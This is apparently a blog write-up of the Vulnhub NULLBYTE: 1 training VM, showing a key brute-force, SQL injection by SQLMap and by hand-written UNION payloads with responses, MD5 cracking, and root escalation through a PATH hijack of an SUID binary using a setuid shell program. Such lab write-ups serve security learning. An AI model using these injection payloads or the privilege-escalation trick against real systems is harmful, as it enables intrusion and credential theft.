---
layout: post
title:  "Vulnhub - NULLBYTE: 1"
date:   2020-10-17 12:00:00 +1100
category: hacking
---

## Introduction
*Objetcive: Get to /root/proof.txt and follow the instructions.  
Level: Basic to intermediate.  
Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.  
Hints: Use your lateral thinking skills, maybe you’ll need to write some code.*

This box is on the [NetSecFocus Admin list](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0) of OSCP-like machines. It's [NULLBYTE: 1](https://www.vulnhub.com/entry/nullbyte-1,126/) from vulnhub.

## Ports
This box has:
1. a filtered SSH port on 22, 
2. an open SSH port on 777, 
3. rpcbind on 111 and 53303, and
4. Apache on Port 80

## HTTP
Gobuster on the root of the webserver reveals a few potentially interesting things in *phpmyadmin* and *uploads*, but we have no creds for phpMyAdmin and no directory listing for uploads. Fuzzing for content in uploads turns up nothing.

The front page of the webserver has a GIF image and some slightly cryptic text:

*If you search for the laws of harmony, you will find knowledge.*

We can download the GIF from the page and check with exiftools to find this:

>Comment                         : P-): kzMb5nVYJw

This is a subdirectory.

## Subdirectory
At http://192.168.1.142/kzMb5nVYJw/ we find a box in which we can enter a 'key'. The page source offers a hint:

>this form isn't connected to mysql, password ain't that complex

I attacked it with Burp Turbo Intruder, and found the key was **elite**.

Entering the key takes us to a page where we can search for usernames, i.e. 

>http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=a

I threw this request at SQLMap and was able to dump out two usernames, and a password hash for one of them:

>1,YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE,ramses,blank

## Hash
The hash is base64 encoded, but we can decode it - it then is revealed to be an MD5. John can take care of the decoded hash:

{% highlight shell %}
root@kali:/opt/vulnhub/nullbyte# john md5.txt --format=Raw-MD5 -w=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
omega            (?)
1g 0:00:00:00 DONE (2020-10-16 11:26) 100.0g/s 1152Kp/s 1152Kc/s 1152KC/s vainilla..silencio
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
{% endhighlight %}

## SSH
Now we can SSH in as *ramses*. Poking around, we can find an SUID binary called **procwatch** in /var/www/backup along with a note saying:

>I have to fix this mess... 

I copy the binary to my own box with **scp** and then decompile it in Ghidra. The decompiled main function looks like this:

{% highlight c %}
undefined4 main(void)
{
  undefined2 local_42;
  undefined local_40;
  undefined *local_c;
  
  local_c = &stack0x00000004;
  local_42 = 0x7370;
  local_40 = 0;
  system((char *)&local_42);
  return 0;
}
{% endhighlight %}

0x7370 is **ps**. So it appears this binary (running as root) is calling **ps**, without specifying the path. Whoops. 

## PS
Here's my new file *ps.c*:

{% highlight c %}
#include <unistd.h>
int main(void)
{
  setuid(0);
  setgid(0);
  system ("/bin/bash");
}
{% endhighlight %}

We'll compile it:

``
ramses@NullByte:/var/www/backup$ gcc ps.c -o ps
``

And add our pwd to our path:

``
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
``

Now let's see:

{% highlight shell %}
ramses@NullByte:/var/www/backup$ ./procwatch 
root@NullByte:/var/www/backup# whoami
root


root@NullByte:/root# cat proof.txt 
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats.
{% endhighlight %}

Great, job done. Or, perhaps not quite.

## SQLi
This obviously wasn't done for the OSCP but they don't let you use SQLMap I don't think, so let's go back and do the SQLi manually.

### Fuzzing

To start the process we can fuzz the *usrtosearch* parameter with Burp Intruder:

>GET /kzMb5nVYJw/420search.php?usrtosearch=§admin§ HTTP/1.1

I used the following list from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection):

{% raw %}
'  
%27  
"  
%22  
#  
%23  
;  
%3B  
)  
{% endraw %}

{% raw %}"{% endraw %} gives this message:
>Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1

and {% raw %}#{% endraw %} gives all of the data about the users:

>EMP ID :1  
EMP NAME : ramses  
EMP POSITION :  
--------------------------------  
EMP ID :2  
EMP NAME : isis  
EMP POSITION : employee  
--------------------------------  
Fetched data successfully   

and we can clearly see there are three fields returned. 

So at this point we know we have MySQL with three fields.

### Field Count
In case we wanted to check, we could do:

>GET /kzMb5nVYJw/420search.php?usrtosearch=admin1"+ORDER+BY+1%23 HTTP/1.1

Where we increment the '1'. When we get to 4, we get the following error:
>Could not get data: Unknown column '4' in 'order clause'

So this also confirms we have 3 fields.

### Contents
We can use the following commands to get the database names, tables, fields and finally data. I also extract the MySQL version information with @@version:

#### Getting the database names
{% highlight html %}
GET /kzMb5nVYJw/420search.php?usrtosearch=admin"+UNION+ALL+SELECT+NULL,@@version,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata%23 HTTP/1.1

EMP ID :  <br> EMP NAME : 5.5.44-0+deb8u1 <br> EMP POSITION : |information_schema|,|mysql|,|performance_schema|,|phpmyadmin|,|seth| <br> --------------------------------<br>Fetched data successfully
{% endhighlight %}

#### Getting the table names from *seth*
{% highlight html %}
GET /kzMb5nVYJw/420search.php?usrtosearch=admin"+UNION+ALL+SELECT+NULL,@@version,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema='seth'%23 HTTP/1.1

EMP ID :  <br> EMP NAME : 5.5.44-0+deb8u1 <br> EMP POSITION : |users| <br> --------------------------------<br>Fetched data successfully
{% endhighlight %}

#### Getting the columns from *users*
{% highlight html %}
GET /kzMb5nVYJw/420search.php?usrtosearch=admin"+UNION+ALL+SELECT+NULL,@@version,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name='users'%23 HTTP/1.1

EMP ID :  <br> EMP NAME : 5.5.44-0+deb8u1 <br> EMP POSITION : |id|,|user|,|pass|,|position| <br> --------------------------------<br>
{% endhighlight %}

#### Getting the data from *user* and *pass*
{% highlight html %}
GET /kzMb5nVYJw/420search.php?usrtosearch=admin"+UNION+ALL+SELECT+NULL,@@version,gRoUp_cOncaT(0x7c,user,0x7C,pass,0x7C)+fRoM+seth.users%23 HTTP/1.1

EMP ID :  <br> EMP NAME : 5.5.44-0+deb8u1 <br> EMP POSITION : |ramses|YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE|,|isis|--not allowed--| <br> --------------------------------<br>
{% endhighlight %}

Now we have the hash manually, no SQLMap required.

Nice box, thanks ly0n
